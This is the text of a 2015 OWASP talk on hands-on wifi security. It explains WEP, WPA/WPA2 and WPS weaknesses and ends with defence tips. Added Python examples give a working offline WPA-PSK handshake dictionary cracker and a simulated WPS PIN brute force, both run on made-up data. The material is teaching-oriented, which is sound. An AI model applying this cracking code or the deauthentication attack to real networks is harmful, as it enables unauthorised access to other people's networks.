Hands-on with wifi security
OWASP Göteborg Security Tapas
2015-10-20
Anders Rosdahl
#whoami
Average security enthusiast. No bleeding edge research, no wall of fames, no CVEs. Actually, this is me...
@rosdahl
Agenda
Wifi overview
Authentication andencryption
Attacks
Defence
Demo/lab
Wifi overview
Access points continuously send beacons to announce themselves. Clients continuously probe for access points.
Joining a network then takes two steps: authentication, followed by association. Beacons, probes and both of these are unencrypted management frames, so anyone in range can observe them.
Bands,channels andfrequencies
802.11  Release year  Frequency (GHz)  Max data transfer rate (Mbit/s)   Bandwidth (MHz)
a       1999          5 (3.7)          54                                20
b       1999          2.4              11                                22
g       2003          2.4              54                                20
n       2009          2.4/5            72/150 (per MIMO stream)          20/40
ac      2013          5                96/200/433/866 (per MIMO stream)  20/40/80/160

there's more...
Wireless Modes
Each wireless device/interface can be in one of the following modes. Definitions vary.
• Station: also referred to as Client mode or Managed mode.
• Master: also referred to as Access Point or Infrastructure mode.
• Ad hoc: peer-to-peer (IBSS) networks without an access point, e.g. mesh wifi networks.
• Monitor: also referred to as RFMON (Radio Frequency MONitor). Used to silently listen to wifi traffic. An interface in this mode can capture traffic without connecting to any network.
Not all combinations of wifi cards/drivers/OS support all modes.
Authentication andencryption
WEP
• Based on the RC4 stream cipher, which is effectively broken
WPA/WPA2
• WPA: intermediate solution while waiting for WPA2, which would fix all that was broken with WEP. Designed by cryptographers.
• Key material from a pre-shared key (PSK, "personal" mode) or from asymmetric key pairs/certificates via 802.1X/EAP ("enterprise" mode)
• TKIP-RC4 (WPA) / CCMP-AES (WPA2)
WPS
• Hands the WPA/WPA2 credentials to a client that proves knowledge of nothing more than a PIN code
• Two modes: Push-Button-Connect, or a 4/8 digit PIN code
Attacks
WPA/WPA2
1. Deauthenticate connected client(s) with traffic injection. Deauthentication frames are unauthenticated management frames (unless 802.11w is used), so anyone in range can forge them.
2. Capture the re-authentication (4-way) handshake.
3. Offline word-list or rule-based brute force attack on the recorded handshake: each candidate passphrase is turned into a key and checked against the MIC in the captured handshake.
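Added example (not code from the slides, and not how aircrack-ng or hashcat are implemented, although they compute the same thing): step 3 done by hand. For each word list candidate the code derives the PMK with PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), expands it into the PTK with the 802.11i PRF-512, and recomputes the MIC over message 2 of the handshake with the first 16 bytes (the KCK); a match means the passphrase is right. Instead of reading a pcap, the "capture" is constructed in-code by make_capture(); the SSID "tapas", the MAC addresses, the nonces, the passphrase "tapas-2015" and the word list are all made up for the example.

```python
"""Offline WPA/WPA2-PSK cracking of a captured 4-way handshake (step 3 above).

Added example for this talk. The handshake is constructed in-code; a real run
would take SSID, MACs, ANonce and EAPOL message 2 from a pcap instead.
"""
import hashlib
import hmac
import struct

EAPOL_MIC_OFFSET = 81      # 802.1X header (4) + EAPOL-Key fields up to the MIC (77)
EAPOL_NONCE_OFFSET = 17    # header (4) + desc. type (1) + key info (2) + key len (2) + replay (8)


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512: PTK from PMK, both MACs and both nonces (min/max ordered)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):                     # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]                        # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck, eapol):
    """MIC over the EAPOL-Key frame with its MIC field zeroed; algorithm from key info."""
    key_info, = struct.unpack_from(">H", eapol, 5)
    zeroed = eapol[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol[EAPOL_MIC_OFFSET + 16:]
    version = key_info & 0x7
    if version == 1:                                    # WPA/TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                    # WPA2/CCMP: HMAC-SHA1-128
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % version)


def crack(ssid, aa, spa, anonce, eapol_msg2, wordlist):
    """Try each candidate passphrase against the MIC of handshake message 2."""
    snonce = eapol_msg2[EAPOL_NONCE_OFFSET:EAPOL_NONCE_OFFSET + 32]
    target = eapol_msg2[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)      # the expensive step (4096 HMACs)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), target):
            return candidate
    return None


def build_msg2(snonce, mic=b"\x00" * 16, version=2):
    """Constructed EAPOL-Key message 2 (STA -> AP): SNonce, MIC and the STA's RSN IE."""
    key_info = 0x0100 | 0x0008 | version                  # MIC bit, pairwise, desc. version
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = b"\x02" + struct.pack(">HHQ", key_info, 0, 1)  # RSN desc. type, key len 0, replay 1
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
    body += mic + struct.pack(">H", len(rsn_ie)) + rsn_ie
    return b"\x01\x03" + struct.pack(">H", len(body)) + body    # 802.1X v1, type EAPOL-Key


def make_capture(ssid, passphrase, aa, spa, anonce, snonce):
    """Simulate what the sniffer records: message 2 with a valid MIC for `passphrase`."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    unsigned = build_msg2(snonce)
    mic = eapol_mic(kck, unsigned)
    return unsigned[:EAPOL_MIC_OFFSET] + mic + unsigned[EAPOL_MIC_OFFSET + 16:]


# Constructed handshake parameters for the example (not a real network).
SSID = b"tapas"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
CAPTURED_MSG2 = make_capture(SSID, "tapas-2015", AP_MAC, STA_MAC, ANONCE, SNONCE)
WORDLIST = ["password", "letmein", "tapas-2015", "correcthorse"]

if __name__ == "__main__":
    print(crack(SSID, AP_MAC, STA_MAC, ANONCE, CAPTURED_MSG2, WORDLIST))   # tapas-2015
```

Two things to take from it: the SSID is the PBKDF2 salt, so the same passphrase yields a different PMK on every network (and rainbow tables only help for common SSIDs), and all the cost is in the 4096-round PBKDF2, which is why a long random passphrase is the defence and GPUs are the attacker's tool.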
WPS
Brute force the WPS PIN. In late 2011/early 2012 several deficiencies in WPS were disclosed. E.g. only max 11k instead of 10M tries are needed, since the AP acks/nacks the first 4 digits separately: 10^4 tries for the first half, then at most 10^3 for the second half, because the last digit of the 8-digit PIN is a checksum. A WPS backoff/timeout (lockout after repeated failures) prevents brute forcing, but was not ubiquitous in 2012.
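Added example (not code from the slides, and not Reaver): a simulation of why the split is so cheap. The Registrar class is a toy model of the AP's WPS registrar that answers the way a real one does: NACK after M4 if the first half is wrong, NACK after M6 if the second half is wrong, M7 (with the credentials) otherwise, and optionally a lockout after a number of failures. The brute force walks the first half, then the second half using the checksum digit, so the worst case is exactly 10,000 + 1,000 = 11,000 queries. The PINs and the lockout threshold are made up for the example.

```python
"""Simulated WPS external-registrar PIN brute force (split PIN, checksum digit).

Added example for this talk. The Registrar class is a toy model of an AP's
WPS registrar; nothing here talks to a real device.
"""

NACK_M4, NACK_M6, M7, LOCKED = "NACK after M4", "NACK after M6", "M7 (credentials)", "AP locked"


def wps_checksum(first7):
    """Checksum digit of an 8-digit WPS PIN: weights 3,1,3,1,3,1,3 over the first 7 digits."""
    accum = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - accum % 10) % 10


class Registrar:
    """Toy AP: reveals, per handshake, whether each half of the PIN was right."""

    def __init__(self, pin, lockout_after=None):
        assert len(pin) == 8 and pin.isdigit()
        self.first, self.second = pin[:4], pin[4:]
        self.lockout_after = lockout_after      # None = no lockout (the 2012 default)
        self.attempts = 0
        self.failures = 0

    def try_pin(self, pin):
        if self.lockout_after is not None and self.failures >= self.lockout_after:
            return LOCKED                        # backoff/lockout in effect
        self.attempts += 1
        if pin[:4] != self.first:
            self.failures += 1
            return NACK_M4                       # AP rejects M4: first half wrong
        if pin[4:] != self.second:
            self.failures += 1
            return NACK_M6                       # AP rejects M6: second half wrong
        return M7                                # AP sends M7 with the WPA credentials


def brute_force(reg):
    """Recover the PIN with at most 10^4 + 10^3 queries; None if locked out or not found."""
    first = None
    for a in range(10000):                        # phase 1: first four digits
        cand = f"{a:04d}"
        r = reg.try_pin(cand + "0000")
        if r == LOCKED:
            return None
        if r == M7:
            return cand + "0000"                  # second half happened to be 0000
        if r == NACK_M6:
            first = cand                          # first half confirmed by the AP
            break
    if first is None:
        return None
    for b in range(1000):                         # phase 2: three digits + checksum
        first7 = first + f"{b:03d}"
        pin = first7 + str(wps_checksum(first7))  # devices that ignore the checksum need 10^4 here
        r = reg.try_pin(pin)
        if r == LOCKED:
            return None
        if r == M7:
            return pin
    return None


if __name__ == "__main__":
    ap = Registrar("12345670")
    print(brute_force(ap), "after", ap.attempts, "attempts")        # 12345670 after 1803 attempts
    worst = Registrar("99999995")
    print(brute_force(worst), "after", worst.attempts, "attempts")  # 99999995 after 11000 attempts
    locked = Registrar("12345670", lockout_after=10)
    print(brute_force(locked), "after", locked.attempts, "attempts")  # None after 10 attempts
```

Compare the 11,000 worst case with the 10^7 PINs that remain once the checksum is known, and note that the lockout branch is exactly the mitigation the slide mentions: with a lockout after a handful of failures the same loop gets nowhere, which is why current APs rate-limit PIN attempts or disable the PIN method altogether.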
WEP
RC4... Capture enough encrypted frames (injection/replay speeds this up), then recover the key offline. The workflow resembles WPA above, but the key is recovered from the statistical weaknesses of RC4's per-packet keys (IV + WEP key) rather than from a word list, so the length of the password does not help.
Defence – hotsecurity tipsforhotspots
• Use long and strong WPA2 passwords!
• Disable WPS on your router
• Don't use WEP, obviously...
• Use a VPN when connected to public access points: anyone can listen
• Be careful with auto-connect features of devices, to avoid connecting to rogue access points
Demo/lab
Alfa cards for loan!